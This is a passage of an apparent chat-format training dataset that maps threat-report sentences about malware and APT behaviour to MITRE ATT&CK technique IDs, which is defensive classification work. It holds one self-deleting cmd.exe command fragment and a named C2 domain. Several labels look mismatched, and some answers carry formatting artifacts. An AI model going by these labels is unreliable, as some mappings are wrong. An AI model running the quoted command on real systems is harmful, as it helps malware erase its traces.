- "content": "Stuxnet enumerates user accounts of the domain."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the registry run key location: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many samples can perform UAC bypass by using eventvwr.exe to execute a malicious file."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe can download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck checks its directory location in an attempt to avoid launching in a sandbox."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has used raw TCP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware sets its persistence mechanism by creating a RunKey in the registry to ensure its survival after system reboot events"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda have acquired C2 domains prior to operations."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT uses cmd.exe to execute scripts and commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM (127bf1d43313736c52172f8dc6513f56) is a .NET-based backdoor that supports commands, including screen capture and keystroke capture. The backdoor may also download and execute additional PowerShell commands from its command and control (C2) server"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs the whoami and query user commands."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CTU researchers observed WCry variants demanding Bitcoin payments equivalent to $300 and $600. The Bitcoin address is provided in the c.wnry configuration file and can vary across samples. If no configuration file is present, the malware uses a hard-coded Bitcoin address. CTU researchers have identified the following Bitcoin addresses associated with the WCry ransomware"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates to the C2 server by retrieving a Google Doc."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used various forms of spearphishing attempting to get a user to open links or attachments."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used spearphishing via a link to get users to download and run their malware."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices. This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1057 - Process Discovery', 'T1120 - Peripheral Device Discovery', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer’s data wiper module writes zeros into the registry keys in \"SYSTEM\\CurrentControlSet\\Services\" to render a system inoperable."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules."
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hi-Zor has the ability to create a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in collects information from the victim about its IP addresses and MAC addresses."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects into the svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has checked for running containers with \"docker ps\" and for specific container names with \"docker inspect\". TeamTNT has also searched for Kubernetes pods running in a local network."
- },
- {
- "role": "assistant",
- "content": "T1613 - Container and Resource Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has extracted files from compromised networks."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can retrieve usernames from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUPY LOADER The Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve can identify and search networked drives for specific file name extensions."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot downloads several additional files and saves them to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has utilized tools to capture mouse movements."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For the rest, we acknowledge that the subdomains used could be indicative of the target; they could also be used to go after third parties that might trust those organizations"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols"
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": ". . Once the second stage is extracted and run, we are presented with the final stage of this attack, which we refer to as ComboJack. Once ComboJack is extracted it begins by copying itself to the following location:"
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has the ability to use form-grabbing to extract data from web data forms."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used spearphishing via a link to get users to download and run their malware."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer can list directories on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot uses the command-line interface to execute arbitrary commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX adds Run key entries in the Registry to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro. All FALLCHILL samples use 16-byte hardcoded RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Felismus uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has used Base64 to decode malicious VBS script."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To check the host language, it queries the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\ and the value InstallLanguage. If the machine has the value 0419 (Russian), 0422 (Ukrainian) or 0423 (Belarusian), it call ExitProcess to stop executing"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the Cl0p variants encrypts the files by generating an RSA public key, retrieving its first 127 bytes and using them as the RC4 key, adding the Cl0p^_- header and the RC4 encrypting it again. Once the files are encrypted, the Cl0p extension will be added to each encrypted file"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used compiled HTML (.chm) files for targeting."
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It creates a socket, requests the address of the hardcoded C2 server \"win-restore.ru\" via gethostbyname() and connects to it. Thereafter, it also collects the volume serial number of C:\\ drive, the computer name and the hardware profile GUID. With this information, it creates the following string used by a subsequent send() function call"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind can delete itself or specified files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It’s clear from our research that the quality of the WannaCry code is poor and the developers made many mistakes, enabling many of those infected to recover encrypted data. The way the attackers handled ransom payments limited their ability to capitalise on the spread of the worm. Multiple attempts were made to track transactions to the bitcoin wallets used by the attackers. Although estimates of how much money the attackers made vary, they run into tens of thousands, rather than hundreds ."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as \"ping\" to identify remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has been observed using SQL injection to gain access to systems."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type has deleted files it has created on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts C2 traffic using AES with a static key."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts strings to make analysis more difficult."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia uses HTTP and HTTPS for C2 network communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used batch scripts to enumerate administrators and users in the domain."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can upload files from the C2 server to the victim machine using the \"upload\" command."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In most systems compromised by Kobalos, the SSH client is compromised to steal credentials. This credential stealer is unlike any of the malicious OpenSSH clients we’ve seen before, and we’ve looked at tens of them in the past eight years. The sophistication of this component is not the same as Kobalos itself: there was no effort to obfuscate early variants of the credential stealer. However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network"
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The process begins with the consistent execution of a malicious DLL using the legitimate regsvr32.exe Windows Utility. Once executed, the DLL is deleted from the system and its components are dropped to the system"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nerex drops a signed Microsoft DLL to disk."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot modifies the time of a file as specified by the control server."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot can enumerate a list of running processes on a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can detect the infected machine's network topology using \"ipconfig\" and \"arp\"."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can change Internet Explorer settings to reduce warnings about malware activity."
- },
- {
- "role": "assistant",
